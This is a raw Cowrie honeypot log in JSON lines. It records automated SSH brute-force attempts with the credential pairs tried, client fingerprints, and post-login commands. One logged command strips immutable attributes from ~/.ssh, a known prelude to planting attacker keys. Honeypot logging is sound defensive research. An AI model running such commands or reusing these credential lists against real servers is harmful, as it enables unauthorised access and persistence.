{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46034,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a1c0f42130a","protocol":"ssh","message":"New connection: 212.227.125.160:46034 (1.2.3.4:22) [session: 8a1c0f42130a]","sensor":"my-vps","timestamp":"2025-08-26T22:07:43.801302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:43.802080Z","src_ip":"212.227.125.160","session":"8a1c0f42130a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:43.857989Z","src_ip":"212.227.125.160","session":"8a1c0f42130a"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:44.004276Z","src_ip":"212.227.125.160","session":"8a1c0f42130a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:45.058585Z","src_ip":"212.227.125.160","session":"8a1c0f42130a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41420,"dst_ip":"1.2.3.4","dst_port":22,"session":"a550dcff33af","protocol":"ssh","message":"New connection: 212.227.125.160:41420 (1.2.3.4:22) [session: a550dcff33af]","sensor":"my-vps","timestamp":"2025-08-26T22:07:51.191052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:51.235443Z","src_ip":"212.227.125.160","session":"a550dcff33af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:51.273624Z","src_ip":"212.227.125.160","session":"a550dcff33af"}
{"eventid":"cowrie.login.failed","username":"tty0","password":"tty0","message":"login attempt [tty0/tty0] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:51.461395Z","src_ip":"212.227.125.160","session":"a550dcff33af"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:52.514219Z","src_ip":"212.227.125.160","session":"a550dcff33af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36804,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a95ee8f6054","protocol":"ssh","message":"New connection: 212.227.125.160:36804 (1.2.3.4:22) [session: 9a95ee8f6054]","sensor":"my-vps","timestamp":"2025-08-26T22:07:54.986746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:54.987376Z","src_ip":"212.227.125.160","session":"9a95ee8f6054"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:55.045207Z","src_ip":"212.227.125.160","session":"9a95ee8f6054"}
{"eventid":"cowrie.login.failed","username":"root1","password":"root1","message":"login attempt [root1/root1] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:55.206496Z","src_ip":"212.227.125.160","session":"9a95ee8f6054"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:56.276837Z","src_ip":"212.227.125.160","session":"9a95ee8f6054"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60422,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dd4f3d668d9","protocol":"ssh","message":"New connection: 212.227.125.160:60422 (1.2.3.4:22) [session: 1dd4f3d668d9]","sensor":"my-vps","timestamp":"2025-08-26T22:08:00.877037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:01.182196Z","src_ip":"212.227.125.160","session":"1dd4f3d668d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:01.184300Z","src_ip":"212.227.125.160","session":"1dd4f3d668d9"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:01.711550Z","src_ip":"212.227.125.160","session":"1dd4f3d668d9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:02.791661Z","src_ip":"212.227.125.160","session":"1dd4f3d668d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52173,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c1d6b7fc304","protocol":"ssh","message":"New connection: 212.227.125.160:52173 (1.2.3.4:22) [session: 6c1d6b7fc304]","sensor":"my-vps","timestamp":"2025-08-26T22:08:05.208000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:05.266811Z","src_ip":"212.227.125.160","session":"6c1d6b7fc304"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:05.393034Z","src_ip":"212.227.125.160","session":"6c1d6b7fc304"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r","message":"login attempt [root/!Q2w#E4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.006716Z","src_ip":"212.227.125.160","session":"6c1d6b7fc304"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:08:06.359937Z","src_ip":"212.227.125.160","session":"6c1d6b7fc304"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.360599Z","src_ip":"212.227.125.160","session":"6c1d6b7fc304"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.516047Z","src_ip":"212.227.125.160","session":"6c1d6b7fc304"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.545348Z","src_ip":"212.227.125.160","session":"6c1d6b7fc304"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55812,"dst_ip":"1.2.3.4","dst_port":22,"session":"c075bbff1686","protocol":"ssh","message":"New connection: 212.227.125.160:55812 (1.2.3.4:22) [session: c075bbff1686]","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.676267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.677538Z","src_ip":"212.227.125.160","session":"c075bbff1686"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.736178Z","src_ip":"212.227.125.160","session":"c075bbff1686"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:08:06.948096Z","src_ip":"212.227.125.160","session":"c075bbff1686"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:08:07.125414Z","src_ip":"212.227.125.160","session":"c075bbff1686"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:08:07.126267Z","src_ip":"212.227.125.160","session":"c075bbff1686"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:07.178797Z","src_ip":"212.227.125.160","session":"c075bbff1686"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:07.180021Z","src_ip":"212.227.125.160","session":"c075bbff1686"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51200,"dst_ip":"1.2.3.4","dst_port":22,"session":"6261bf5c4c43","protocol":"ssh","message":"New connection: 212.227.125.160:51200 (1.2.3.4:22) [session: 6261bf5c4c43]","sensor":"my-vps","timestamp":"2025-08-26T22:08:12.266087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:12.286741Z","src_ip":"212.227.125.160","session":"6261bf5c4c43"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:12.326006Z","src_ip":"212.227.125.160","session":"6261bf5c4c43"}
{"eventid":"cowrie.login.failed","username":"nova","password":"nova","message":"login attempt [nova/nova] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:12.556506Z","src_ip":"212.227.125.160","session":"6261bf5c4c43"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:13.612234Z","src_ip":"212.227.125.160","session":"6261bf5c4c43"}
{"eventid":"cowrie.session.connect","src_ip":"200.195.162.69","src_port":56284,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c12bf436013","protocol":"ssh","message":"New connection: 200.195.162.69:56284 (1.2.3.4:22) [session: 9c12bf436013]","sensor":"my-vps","timestamp":"2025-08-26T22:08:17.546700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:08:17.547378Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:08:17.751775Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.login.success","username":"root","password":"Qweqwe123.","message":"login attempt [root/Qweqwe123.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:08:18.609291Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:08:19.037722Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.038599Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.040120Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46592,"dst_ip":"1.2.3.4","dst_port":22,"session":"157801d0e2c4","protocol":"ssh","message":"New connection: 212.227.125.160:46592 (1.2.3.4:22) [session: 157801d0e2c4]","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.137591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.138447Z","src_ip":"212.227.125.160","session":"157801d0e2c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.188239Z","src_ip":"212.227.125.160","session":"157801d0e2c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.244922Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
{"eventid":"cowrie.login.failed","username":"polkitd","password":"polkitd","message":"login attempt [polkitd/polkitd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:08:19.347130Z","src_ip":"212.227.125.160","session":"157801d0e2c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:08:19.772889Z","src_ip":"200.195.162.69","session":"9c12bf436013"}
